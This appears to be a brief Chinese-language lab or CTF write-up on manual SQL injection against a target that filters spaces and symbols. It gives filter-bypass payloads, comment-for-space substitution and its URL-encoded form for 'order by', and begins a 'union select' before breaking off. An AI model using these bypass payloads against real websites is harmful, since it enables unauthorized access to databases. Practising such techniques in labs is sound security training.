0x2F.SQL過濾字符後手工注入漏洞測試(第1題)

經過測試,發現空格,符號等都被過濾,所以通過替換被過濾的符號並且進行url編碼後才能繼續注入; 測試列數; /**/order/**/by/**/5# %2f%2a%2a%2f%6f%72%64%65%72%2f%2a%2a%2f%62%79%2f%2a%2a%2f%35%23 以下級聯查詢需將id=1改爲id=-1,才能顯示級聯後的查詢內容; 測試顯位點; /**/union/**/select
相關文章
相關標籤/搜索